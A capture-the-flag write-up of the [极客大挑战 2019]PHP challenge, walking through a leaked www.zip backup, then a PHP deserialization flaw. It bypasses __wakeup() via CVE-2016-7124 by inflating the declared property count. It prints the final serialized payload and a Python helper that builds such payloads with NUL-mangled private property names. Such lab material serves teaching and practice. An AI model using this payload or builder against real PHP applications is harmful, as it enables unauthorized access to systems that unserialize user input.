[极客大挑战 2019]PHP
<p><strong>[极客大挑战 2019]PHP</strong><br>Key points:<br>
1. Website backup file left in the web root: www.zip<br>
2. PHP deserialization: when the property count declared in the serialized string is greater than the real number of properties, unserialize() skips the __wakeup() method. This only holds on PHP before 5.6.25 / 7.0.10 (CVE-2016-7124); newer versions reject the object and __wakeup() is never bypassed this way.<br>
<img src="https://img2020.cnblogs.com/blog/1257459/202007/1257459-20200715222435415-2111016550.png" alt="" loading="lazy"></p>
<p>Backup-file leak. A directory scanner should be able to find it, but for some reason neither 御剑 nor DirBuster turned it up. Appending www.zip to the URL directly downloads the site backup; unpacking it reveals three PHP files, which we go through one by one.<br>
<img src="https://img2020.cnblogs.com/blog/1257459/202007/1257459-20200715222443950-166575468.png" alt="" loading="lazy"></p>
<p>The flag inside the downloaded flag.php is obviously not the real answer. Moving on, the important file is class.php: it defines PHP magic methods, so a deserialization vulnerability is likely.<br>
<img src="https://img2020.cnblogs.com/blog/1257459/202007/1257459-20200715222452450-29608332.png" alt="" loading="lazy"></p>
<p>Looking at the code more closely:<br>
<img src="https://img2020.cnblogs.com/blog/1257459/202007/1257459-20200715222500375-1027784808.png" alt="" loading="lazy"></p>
<p>index.php includes class.php and passes the user input straight to unserialize():<br>
<img src="https://img2020.cnblogs.com/blog/1257459/202007/1257459-20200715222510931-1845793292.png" alt="" loading="lazy"></p>
<p>After unserialization, __wakeup() runs and overwrites the username we supplied. The simplest way to build a starting payload is to instantiate the object right below the class definition and call serialize() on it.<br>
<img src="https://img2020.cnblogs.com/blog/1257459/202007/1257459-20200715222525320-1306689527.png" alt="" loading="lazy"><br>
<img src="https://img2020.cnblogs.com/blog/1257459/202007/1257459-20200715222533595-1896191012.png" alt="" loading="lazy"></p>
<p>Then, to bypass __wakeup(), change the property count after Name from 2 to 3. Because username and password are private properties, their serialized names carry the class name wrapped in NUL bytes (\0Name\0username, hence the length s:14). The NUL bytes are invisible and get lost when the string is copied, so they have to be written as %00 when the payload is submitted in the URL.<br>
Final payload:</p>
<pre><code>O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
</code></pre>
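<p>As an added example (not code from the original writeup), a small Python helper that rebuilds the payload above: it applies PHP's property-name mangling for private/protected members, inflates the declared property count to trigger the __wakeup() skip, and percent-encodes the NUL bytes so they survive a GET parameter. The Name class layout (private username and password) is taken from the writeup's description; the class source itself only appears in screenshots.</p>

```python
from urllib.parse import quote

# Constructed example: rebuilds the writeup's payload for the Name class.
# The private username/password layout is an assumption based on the
# writeup's description of class.php.

def mangle(cls, name, visibility):
    """PHP serialises property names by visibility:
    public -> name, protected -> \\0*\\0name, private -> \\0Class\\0name."""
    if visibility == "private":
        return f"\0{cls}\0{name}"
    if visibility == "protected":
        return f"\0*\0{name}"
    return name


def php_scalar(v):
    """Serialise the scalar types this payload needs (bool, int, str)."""
    if isinstance(v, bool):
        return f"b:{int(v)};"
    if isinstance(v, int):
        return f"i:{v};"
    if isinstance(v, str):
        # PHP string lengths are in bytes; each NUL counts as one byte
        return f's:{len(v.encode())}:"{v}";'
    raise TypeError(f"unsupported type {type(v).__name__}")


def php_serialize_object(cls, props, bypass_wakeup=False):
    """props: list of (name, visibility, value).
    With bypass_wakeup the declared property count is one more than the
    real count; on PHP < 5.6.25 / 7.0.10 (CVE-2016-7124) unserialize()
    then skips __wakeup() for the object."""
    body = "".join(php_scalar(mangle(cls, n, vis)) + php_scalar(val)
                   for n, vis, val in props)
    count = len(props) + (1 if bypass_wakeup else 0)
    return f'O:{len(cls)}:"{cls}":{count}:{{{body}}}'


def url_param(serialized):
    """Percent-encode for a GET parameter. NUL becomes %00, which is the
    part a browser address bar or a copy-paste would otherwise drop."""
    return quote(serialized, safe="")


# Properties as the writeup sets them: username 'admin', password 100
PROPS = [("username", "private", "admin"),
         ("password", "private", 100)]

if __name__ == "__main__":
    honest = php_serialize_object("Name", PROPS)               # count 2
    evil = php_serialize_object("Name", PROPS, bypass_wakeup=True)  # count 3
    print(repr(honest))
    print(repr(evil))
    print("?select=" + url_param(evil))
```

<p>The non-bypass string is what serialize() prints when you instantiate the object under the class; the bypass string differs only in the declared count, which is exactly the change the writeup makes by hand.</p>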
<p>Submitting it returns the flag.<br>
<img src="https://img2020.cnblogs.com/blog/1257459/202007/1257459-20200715222541010-1892656087.png" alt="" loading="lazy"></p>
Source: https://www.cnblogs.com/yunqian2017/p/13308559.html